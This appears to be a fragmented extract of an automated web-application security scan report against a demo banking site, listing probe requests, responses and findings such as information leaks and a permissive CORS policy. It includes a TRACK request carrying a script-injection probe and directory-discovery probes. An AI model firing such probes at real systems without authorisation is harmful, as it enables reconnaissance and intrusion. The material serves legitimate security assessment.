X-Request-Memo: ID="797be3c0-690f-46e4-a978-485cb342bb23"; sc="1"; ThreadId="101";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:11 GMT

Page:
description
http://zero.webappsecurity.com:80/backup/
Request:
GET /backup/ HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="B00CD470CE6F47816EAC8B94B3E4D1FC";
X-RequestManager-Memo: sid="39"; smi="0"; sc="1"; ID="e7914a6d-bf39-4abf-89d2-90c220d31ffa";
X-Request-Memo: ID="76d827f0-c596-4f1a-aee1-d06bd51ec5ed"; sc="1"; ThreadId="101";
Response:
HTTP/1.1 403 Forbidden
Date: Mon, 10 Oct 2016 07:51:13 GMT
S...TRUNCATED...

Page:
description
http://zero.webappsecurity.com:80/scripts/
Request:
GET /scripts/ HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="8D695AA103CB5BFCC70FFF7C6062147A";
X-RequestManager-Memo: sid="51"; smi="0"; sc="1"; ID="831003a8-6362-49dc-9139-27971b407a19";
X-Request-Memo: ID="26b4513c-0fa0-46f2-9465-3e061e5d6534"; sc="1"; ThreadId="107";
34
Response:
Date: Mon, 10 Oct 2016 07:51:16 GMT
S...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/cgi-bin/
Request:
GET /cgi-bin/ HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="4F59A2869EF7F0A2D7CD991C897978A2";
X-RequestManager-Memo: sid="47"; smi="0"; sc="1"; ID="39bf71f5-f6ed-494b-85b7-b2ed13e7bea0";
X-Request-Memo: ID="4eb5597d-fe76-49a6-9eb0-00bbaa89b896"; sc="1"; ThreadId="105";
Response:
Date: Mon, 10 Oct 2016 07:51:14 GMT
S...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/htbin/
Request:
GET /htbin/ HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="06C0949C38AC94260BD0CEFB9FF67B42";
X-RequestManager-Memo: sid="45"; smi="0"; sc="1"; ID="8651bed3-7987-4343-ac3a-4b626bd79b39";
X-Request-Memo: ID="415282ad-05cd-4dd7-991c-b96aa0daa42b"; sc="1"; ThreadId="104";
Response:
Date: Mon, 10 Oct 2016 07:51:15 GMT
S...TRUNCATED...

Page:
description
http://zero.webappsecurity.com:80/include/
Request:
GET /include/ HTTP/1.1
Accept: */*
Pragma: no-cache
Host:
Connection:
Keep-Alive
35
X-Scan-Memo: Category="Audit.Attack"; SID="B575CF6508C02A80B46DA672DF270F32";
X-RequestManager-Memo: sid="45"; smi="0"; sc="1"; ID="50320ba5-6830-4a9e-9e1f-c2877152caf9";
X-Request-Memo: ID="719f6775-3571-4ef4-9e77-035321c009db"; sc="1"; ThreadId="104";
Response:
Date: Mon, 10 Oct 2016 07:51:18 GMT
S...TRUNCATED...
Page:
Request:
GET /errors/ HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="BB23AC8A7B9C89C3DE9576C0FEACCA3F";
X-RequestManager-Memo: sid="43"; smi="0"; sc="1"; ID="80f80983-ecf1-439a-863c-27a58b849768";
X-Request-Memo: ID="2d21df20-9bb0-436e-a9b2-bb11433be3dd"; sc="1"; ThreadId="103";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:17 GMT

Page:
description
http://zero.webappsecurity.com:80/db/
Request:
GET /db/ HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="B9AE01903B1D6483D2F28A9BB6CEC42B";
X-RequestManager-Memo: sid="47"; smi="0"; sc="1"; ID="ad596ec0-9acc-4b24-82ca-9bb3cce2ec7b";
X-Request-Memo: ID="18e1624d-6480-4851-aff4-c3e7bba46af9"; sc="1"; ThreadId="105";
Response:
Date: Mon, 10 Oct 2016 07:51:24 GMT
S...TRUNCATED...

description
36

Page:
description
http://zero.webappsecurity.com:80/testing/
Request:
GET /testing/ HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="893CA5890C66F16200F5520C0F46033A";
X-RequestManager-Memo: sid="43"; smi="0"; sc="1"; ID="ec28809d-2368-456e-9d24-338a1b701914";
X-Request-Memo: ID="ceab30e2-031b-4503-80f2-b3d81cf948b7"; sc="1"; ThreadId="103";
Response:
Date: Mon, 10 Oct 2016 07:51:27 GMT
S...TRUNCATED...

Page:
description
http://zero.webappsecurity.com:80/docs/
Request:
GET /docs/ HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="F123B9A3291354F97AC6F79540B0A325";
X-RequestManager-Memo: sid="47"; smi="0"; sc="1"; ID="9cc3750e-2cbb-4dd7-aca5-af08fb3677ce";
X-Request-Memo: ID="41b495e0-aabd-4c31-bd33-775eb1e270ea"; sc="1"; ThreadId="105";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:28 GMT

Page:
description
http://zero.webappsecurity.com:80/stats/
Request:
GET /stats/ HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo:
Category="Audit.Attack"; SID="0036DDD44B029BA89605F462C087D6CD";
37
X-Scan-Memo: Category="Audit.Attack"; SID="0036DDD44B029BA89605F462C087D6CD";

X-RequestManager-Memo: sid="53"; smi="0"; sc="1"; ID="65f06df2-2161-4d6a-915b-060c08ee9794";
X-Request-Memo: ID="107df763-ccc8-40c8-9c35-fe8294bfd83f"; sc="1"; ThreadId="108";
Response:
Date: Mon, 10 Oct 2016 07:51:41 GMT
S...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/error_log/
Request:
GET /error_log/ HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="3AAD17D0F26A97B041A9AED28823D7EF";
X-RequestManager-Memo: sid="49"; smi="0"; sc="1"; ID="fd7bdd43-fb4c-454d-9f3f-f505ede276d4";
X-Request-Memo: ID="d8147d81-f1b6-4198-88c6-9406b4bc7c22"; sc="1"; ThreadId="106";
Response:
Date: Mon, 10 Oct 2016 07:51:40 GMT
S...TRUNCATED...

Page:
description
http://zero.webappsecurity.com:80/user/
Request:
GET /user/ HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="6A1ED77117E1B16F946BCDF912E86C55";
X-RequestManager-Memo: sid="51"; smi="0"; sc="1"; ID="06255d2d-d94f-491e-a00f-4af2b186cf85";
X-Request-Memo: ID="b6ec7db2-1d5c-4538-b4a4-57b1f8f4023c"; sc="1"; ThreadId="107";
Response:
Date: Mon, 10 Oct 2016 07:51:50 GMT
S...TRUNCATED...

Page: http://zero.webappsecurity.com:80/README.txt
description
38
Page:
http://zero.webappsecurity.com:80/README.txt
Request:
GET /README.txt HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="A7014097004A822F436038B57058EAD5";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="AuditAttack"; CrawlType="None"; AttackType="None";
X-RequestManager-Memo: sid="41"; smi="0"; sc="1"; ID="74c8420e-6de3-4901-ac23-623a7bd1a62a";
X-Request-Memo: ID="305d1b88-9245-4575-b56e-7f19e29822b9"; sc="1"; ThreadId="102";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:15 GMT

Page:
description
http://zero.webappsecurity.com:80/docs/building.html
Request:
GET /docs/building.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="92BF4760E2D0FDCA4ABB18FC0B743B5E";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="4fede3ba-e46c-473f-8253-ef124324ef8f";
X-Request-Memo: ID="93076e7c-a2b4-4b9a-bfb5-cd5b632a4b75"; sc="1"; ThreadId="96";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:48 GMT
ETag: W/"21672-1466008846000"
...TRUNCATED..."><pre><code># Location of Java 7 JDK
java.7.home=C:/Program Files (x86)/Java/jdk1.7.0_72</code></pre></...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/config/host.html
Request:
GET /docs/config/host.html HTTP/1.1
Referer:*/*
http://zero.webappsecurity.com/docs/jndi-datasource-examples-howto.html
Accept:
39
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="9BA142D4531EC16215DCD9F6E7E33584";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="e3dc82e3-8a3a-4298-8446-3d93674c2544";
X-Request-Memo: ID="5b7dd298-0e80-4a06-8917-818af40546db"; sc="1"; ThreadId="99";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:53:22 GMT
ETag: W/"43300-1466008846000"
...TRUNCATED... in a specified base
directory (such as <code>c:\Homes</code> in this example) to be
considered...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/windows-service-howto.html
Request:
GET /docs/windows-service-howto.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="9BD235AA424324B5BDC5899093604D45";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="105ad3c1-28d2-4187-b7b2-14863f871084";
X-Request-Memo: ID="2b32fe4a-eddc-4517-9709-7b93ed3848e2"; sc="1"; ThreadId="98";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:34 GMT
ETag: W/"27219-1466008848000"
...TRUNCATED...
<div class="codeBox"><pre><code>set CATALINA_HOME=c:\tomcat_7
set CATALINA_BASE=c:\tomcat_7\instances\instance1
service
install insta...TRUNCATED...
<div
class="codeBox"><pre><code>set
CATALINA_BASE=c:\tomcat_7\instances\instance2
40
<div class="codeBox"><pre><code>set CATALINA_BASE=c:\tomcat_7\instances\instance2

service install insta...TRUNCATED...
Page:
Request:
Accept: */*
Pragma: no-cache
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:38 GMT
ETag: W/"504686-1368929102000"
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn C:\old_repo\root\oad\incoming\lorenzo\boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn C:\old_repo\root\oad\incoming\lorenzo\boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston
blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston
boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston
choices.h...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/windows-auth-howto.html
Request:
GET /docs/windows-auth-howto.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="FF70A74D422C22B72591B6C68DE7DBA3";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="e2085897-d964-4fb8-80e5-97e2cc35784c";
X-Request-Memo: ID="49bd3422-4472-4f1c-8766-5779e21a7e15"; sc="2"; ThreadId="97";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:43 GMT
Server:
Apache-Coyote/1.1 *
41
ETag: W/"27921-1466008846000"
...TRUNCATED...e):
<div class="codeBox"><pre><code>ktpass /out c:\tomcat.keytab /mapuser tc01@DEV.LOCAL
/p...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/html-manager-howto.html
Request:
GET /docs/html-manager-howto.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/manager-howto.html
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="05A583C38101A149DDE1801354194040";
PSID="112FD5EEB1B0EC04177727EFB7E63F42"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="d0d7bc4d-0890-4888-83b0-3fba7c4590da";
X-Request-Memo: ID="28331577-d871-46f2-a1ce-9381e852cd17"; sc="1"; ThreadId="96";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:53:03 GMT
ETag: W/"36392-1466008846000"
...TRUNCATED...he web application located in the directory
<code>C:\path\to\foo</code> on the Tomcat server (running on...TRUNCATED...

Page:
description
Request:
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="F9F85B774F218404194F09238B4A9EF9";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
X-RequestManager-Memo: sid="41"; smi="0"; sc="1"; ID="0b1fd969-d62c-48aa-afac-df632dd5414f";
X-Request-Memo: ID="ec653cd9-e832-4472-bd32-8079961169ab"; sc="1"; ThreadId="102";
42
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:54:27 GMT
System Information Leak: LDAP Query

Page:
description
http://zero.webappsecurity.com:80/docs/realm-howto.html
Request:
GET /docs/realm-howto.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="1ECABF8131D9FB74C4F25E6F3BB95533";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="1a2ace84-1955-4345-a9e8-fadc02fda9ec";
X-Request-Memo: ID="642ab42b-ae55-4a13-8cf5-90b8052483f9"; sc="1"; ThreadId="96";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:14 GMT
ETag: W/"67464-1466008846000"
...TRUNCATED...he.catalina.realm.JNDIRealm"
connectionURL="ldap://localhost:389"
userPattern="uid={0},ou=people,dc=mycomp...TRUNCATED...he.catalina.realm.JNDIRealm"
userBase="ou=people,dc=mycompany,dc=c...TRUNCATED...
connectionPassword="secret"
userPassword="userPassword"
userP...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/config/listeners.html
Request:
GET /docs/config/listeners.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/jndi-datasource-examples-howto.html
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="696E82F0D0DB9E2D37764BFE766D74AE";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="b2a89a24-3bdf-406a-8fb4-51431fde34cb";
X-Request-Memo:
ID="455c0f28-12af-4d34-b488-f28ad4437f21"; sc="2"; ThreadId="97";
Cookie:
CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
43
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:53:24 GMT
ETag: W/"42468-1466008846000"
...TRUNCATED...ule.LdapLoginModule REQUIRED
userProvider="ldap://ldap-svr/ou=people,dc=example,dc=com"
userFilte...TRUNCATED...
Poor Error Handling: Server Error Message

Page:
description
http://zero.webappsecurity.com:80/account/
Request:
GET /account/ HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="551A58F3CAE8D76CCDEE29CAB920CF53";
X-RequestManager-Memo: sid="51"; smi="0"; sc="1"; ID="0dcb8edc-da07-4d15-8bb4-66a65d53899d";
X-Request-Memo: ID="50ed1642-dcbc-4d5c-8f13-cb22de7c9c32"; sc="1"; ThreadId="107";
Response:
HTTP/1.1 500 Internal Server Error
Date: Mon, 10 Oct 2016 07:...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/<script>alert('TRACK');</script>
Request:
TRACK /<script>alert('TRACK');</script> HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="A4FB02D5C410323E6D90001C41301D87";
PSID="5691FBE4D5310DEC25DD5EB591F3E328"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
X-RequestManager-Memo: sid="41"; smi="0"; sc="1"; ID="f4a152a7-ef66-4ced-ae43-1145129b2717";
X-Request-Memo: ID="2f9e2ddb-775d-4ead-bdb8-816756b2f322"; sc="1"; ThreadId="102";
Response:
HTTP/1.1 501 Not Implemented
Date: Mon, 10 Oct 2016 07:52:21 ...TRUNCATED...
44
HTML5: Overly Permissive CORS Policy

Page:
description
http://zero.webappsecurity.com:80/docs/funcspecs/index.html
Request:
GET /docs/funcspecs/index.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="9ED4F10AC6184B9298A6A51C297C202A";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="ac0bae26-fb9e-448e-9639-491c1b5a57a4";
X-Request-Memo: ID="4d993be0-b9b5-48aa-b934-5d30dea3ccc9"; sc="2"; ThreadId="100";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:57 GMT
ETag: W/"8461-1466008846000"
<html><head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>Catalina Functional
Specifications (7.0.70) - Table of Contents</title><meta name="author" content="Craig R. McClanahan"><style type="text/css"
media="print">
.noPrint {display: none;}
td#mainBody {width: 100%;}
</style><style type="text/css">
code {background-color:rgb(224,255,255);padding:0 0.1em;}
code.attributeName, code.propertyName {background-color:transparent;}
table {
border-collapse: collapse;
text-align: left;
}
table *:not(table) {
/* Prevent border-collapsing for table child elements like <div> */
border-collapse: separate;
}
th {
text-align: left;
}
div.codeBox pre code, code.attributeName, code.propertyName, code.noHighlight, .noHighlight code {

background-color: transparent;
}
div.codeBox {
overflow: auto;
margin: 1em 0;
}
div.codeBox pre {
margin: 0;
padding: 4px;
border: 1px solid #999;
border-radius:
5px;#eff8ff;
background-color:
45
background-color: #eff8ff;
display: table; /* To prevent <pre>s from taking the complete available width. */
/*
When it is officially supported, use the following CSS instead of display: table
to prevent big <pre>s from exceeding the browser window:
max-width: available;
width: min-content;
*/
}
div.codeBox pre.wrap {
white-space: pre-wrap;
}
table.defaultTable tr, table.detail-table tr {

border: 1px solid #CCC;
}
table.defaultTable tr:nth-child(even), table.detail-table tr:nth-child(even) {
background-color: #FAFBFF;
}
table.defaultTable tr:nth-child(odd), table.detail-table tr:nth-child(odd) {
background-color: #EEEFFF;
}
table.defaultTable th, table.detail-table th {
background-color: #88b;
color: #fff;
}
table.defaultTable th, table.defaultTable td, table.detail-table th, table.detail-table td {
padding: 5px 8px;
}
p.notice {
border: 1px solid rgb(255, 0, 0);
background-color: rgb(238, 238, 238);
color: rgb(0, 51, 102);
padding: 0.5em;
margin: 1em 2em 1em 1em;
}
</style></head><body bgcolor="#ffffff" text="#000000" link="#525D76" alink="#525D76" vlink="#525D76"><table
border="0" width="100%" cellspacing="0"><tr><td><a
href="http://tomcat.apache.org/"><img src="../images/tomcat.gif" align="right" alt="
Catalina Functional Specifications
" border="0"></a></td><td><h1><font face="arial,helvetica,sanserif">Apache Tomcat 7</font></h1><font
face="arial,helvetica,sanserif">Version 7.0.70, Jun 15 2016</font></td><td><a
href="http://www.apache.org/"><img src="../images/asf-logo.gif" align="right" alt="Apache Logo"
border="0"></a></td></tr></table><table border="0" width="100%" cellspacing="4"><tr><td
colspan="2"><hr noshade size="1"></td></tr><tr><td width="20%" valign="top" nowrap
class="noPrint"><p><strong>Links</strong></p><ul><li><a href="../index.html">Docs Home</a></li><li><a
href="index.html">Functional Specs</a></li><li><a href="http://wiki.apache.org/tomcat/FAQ">FAQ</a></li><li><a
href="#comments_section">User Comments</a></li></ul><p><strong>Administrative Apps</strong></p><ul><li><a
href="fs-admin-apps.html">Overall Requirements</a></li><li><a href="mbean-names.html">Tomcat MBean
Names</a></li><li><a href="fs-admin-objects.html">Administered Objects</a></li><li><a href="fs-adminopers.html">Supported Operations</a></li></ul><p><strong>Internal Servlets</strong></p><ul><li><a href="fsdefault.html">Default Servlet</a></li></ul><p><strong>Realm Implementations</strong></p><ul><li><a href="fs-jdbcrealm.html">JDBC Realm</a></li><li><a href="fs-jndi-realm.html">JNDI Realm</a></li><li><a href="fs-memory-realm.
...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/servletapi/index.html
Request:
GET /docs/servletapi/index.html HTTP/1.1
Accept: */*
Pragma: no-cache
User-Agent:
Host:
46
X-Scan-Memo: Category="Crawl"; SID="9A374CF6133C82D2A83C2624AADBEB16";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="1403531a-d139-41f6-a815-87b38535cc27";
X-Request-Memo: ID="1e647ffc-4e3e-44cf-988c-fcabc862b92f"; sc="1"; ThreadId="97";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:46 GMT
ETag: W/"1323-1466008840000"
<!-Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<!doctype html public "-//w3c//dtd html 4.0 transitional//en" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>API docs</title>
</head>
<body>
The Servlet Javadoc is not installed by default. Download and install
the "fulldocs" package to get it.
You can also access the javadoc online in the Tomcat
<a href="http://tomcat.apache.org/tomcat-7.0-doc/">
documentation bundle</a>.
</body>
</html>
Page:
http://zero.webappsecurity.com:80/docs/websocketapi/
Request:
GET /docs/websocketapi/ HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/websocketapi/index.html
Accept: */*
Pragma: no-cache
X-Scan-Memo:
Category="Audit.Attack"; SID="93F640E9C0950666F44249BE903412FF";
PSID="5BE22692ADEF2CF19E101E8F2AE21ECC";
SessionType="PathTruncation"; CrawlType="None"; AttackType="None";
47
PSID="5BE22692ADEF2CF19E101E8F2AE21ECC"; SessionType="PathTruncation"; CrawlType="None"; AttackType="None";

OriginatingEngineID="398bfe9e-1b77-4458-9691-603eea06e341"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="0"; Engine="Path+Truncation";
X-RequestManager-Memo: sid="55"; smi="0"; sc="1"; ID="e9559930-7746-478d-9434-4a8e41960913";
X-Request-Memo: ID="86a327bd-5c9a-43fc-a122-c5bce0732f93"; sc="1"; ThreadId="109";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=B17F0383
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:01:32 GMT
ETag: W/"1185-1466008840000"
-->
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
</head>
<body>
The WebSocket Javadoc is not installed by default. Download and install
</body>
</html>
Page:
http://zero.webappsecurity.com:80/docs/appdev/sample/
Request:
GET /docs/appdev/sample/ HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="B2C4DB9BD43BD67F563C5590060864D1";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="b67d6926-e16e-4203-8af2-9905667eb186";
48

X-Request-Memo: ID="aecfdea2-744b-43a1-a28c-4004b66050ab"; sc="2"; ThreadId="99";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:53:20 GMT
ETag: W/"1852-1466008838000"
-->
<html>
<head>
<meta name="author" content="Ben Souther" />
<title>Sample Application</title>
</head>
<body>
<h2>Sample Application</h2>
<p>
The example app has been packaged as a war file and can be downloaded
<a href="sample.war">here</a> (Note: make sure your browser doesn't
change file extension or append a new one).
</p>
<p>
The easiest way to run this application is simply to move the war file
to your <b>CATALINA_HOME/webapps</b> directory. Tomcat will automatically
expand and deploy the application for you. You can view it with the
following URL (assuming that you're running tomcat on port 8080
as is the default):
<br />
<a href="http://localhost:8080/sample">http://localhost:8080/sample</a>
</p>
<p>
If you just want to browse the contents, you can unpack the war file
with the <b>jar</b> command.
</p>
<pre>
jar -xvf sample.war
</pre>
</body>
</html>
Page:
Request:
Accept: */*
Pragma: no-cache
User-Agent:
49
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="903a6949-6ac8-489d-8c93-bb0ff0a74979";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:28 GMT
ETag: W/"21684-1368929102000"
Tue Jan 22 09:11:32 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authenticate
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [Suspendisse] and password [Nunc].
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [pede] and password [Donec].
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [magna.] and password [eget].
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [sed] and password [risus].
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [Aliquam] and password [Morbi].
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [eu] and password [arcu.].
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [Morbi] and password [non,].
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [tellus] and password [parturient].
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [enim,] and password [vitae].
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [sapien.] and password [laoreet].
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [leo.] and password [amet].
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [commodo] and password [natoque].
Wed Jan 23 01:11:37 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authenticate
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [vitae,] and password [vel,].
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [Suspendisse] and password [Nunc].
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [ipsum.] and password [Proin].
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [enim.] and password [non,].
(UserAuthenticator.java:51)] - Not possible to authenticate a user with login [at] and password [enim.].
Wed Jan 23 10:08:34 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.U
...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/appdev/sample/sample.war
Request:
GET /docs/appdev/sample/sample.war HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/appdev/sample/
Accept: */*
Pragma: no-cache
User-Agent:
50
X-Scan-Memo: Category="Crawl"; SID="C80E2163C3B058B420F9C08BCCC51C62";
PSID="B2C4DB9BD43BD67F563C5590060864D1"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="3e19822b-2222-489c-ab42-6a4446fc16ce";
X-Request-Memo: ID="686c8472-e5a7-47a0-b06b-7f9b9014ae51"; sc="1"; ThreadId="99";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:54:13 GMT
ETag: W/"4606-1466008838000"
Content-Length: 51
<truncated>application/x-zip-compressed</truncated>
Page:
http://zero.webappsecurity.com:80/docs/tribes/introduction.html
Request:
GET /docs/tribes/introduction.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="CD5E19BE8CC24688BC7308F171997466";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="07f7b923-6839-4ba7-a938-9cf0c5eb1f61";
X-Request-Memo: ID="040cfd4a-ab06-4d31-975e-edb1f8a6adf6"; sc="1"; ThreadId="100";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:53:00 GMT
ETag: W/"23070-1466008840000"
<html><head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>Apache Tribes - The Tomcat
Cluster Communication Module (7.0.70) - Apache Tribes - Introduction</title><meta name="author" content="Filip
Hanik"><style type="text/css" media="print">
table {
51
table {
text-align: left;
}
}
th {
text-align: left;
}

}
div.codeBox {
overflow: auto;
margin: 1em 0;
}
div.codeBox pre {
margin: 0;
padding: 4px;
border-radius: 5px;
/*
width: min-content;
*/
}
}

}
}
}
color: #fff;
}
padding: 5px 8px;
}
p.notice {
color: rgb(0, 51, 102);
padding: 0.5em;
}
href="http://tomcat.apache.org/"><img src="../images/tomcat.gif" align="right" alt="Apache Tomcat"
border="0"></a></td><td><h1><font face="arial,helvetica,sanserif">Apache Tomcat 7</font></h1><font
52

href="introduction.html">Tribes Docs Home</a></li><li><a href="http://wiki.apache.org/tomcat/FAQ">FAQ</a></li><li><a
href="#comments_section">User Comments</a></li></ul><p><strong>User Guide</strong></p><ul><li><a
href="introduction.html">1) Introduction</a></li><li><a href="setup.html">2) Setup</a></li><li><a href="faq.html">3)
FAQ</a></li></ul><p><strong>Reference</strong></p><ul><li><a href="../api/org/apache/catalina/tribes/packagesummary.html">JavaDoc</a></li></ul><p><strong>Apache Tribes Development</strong></p><ul><li><a
href="membership.html">Membership</a></li><li><a href="transport.html">Transport</a></li><li><a
href="interceptors.html">Interceptors</a></li><li><a href="status.html">Status</a></li><li><a
href="developers.html">Developers
...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/jspapi/
Request:
GET /docs/jspapi/ HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/jspapi/index.html
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="EFDF7B892053C63944C29F6DB63E233F";
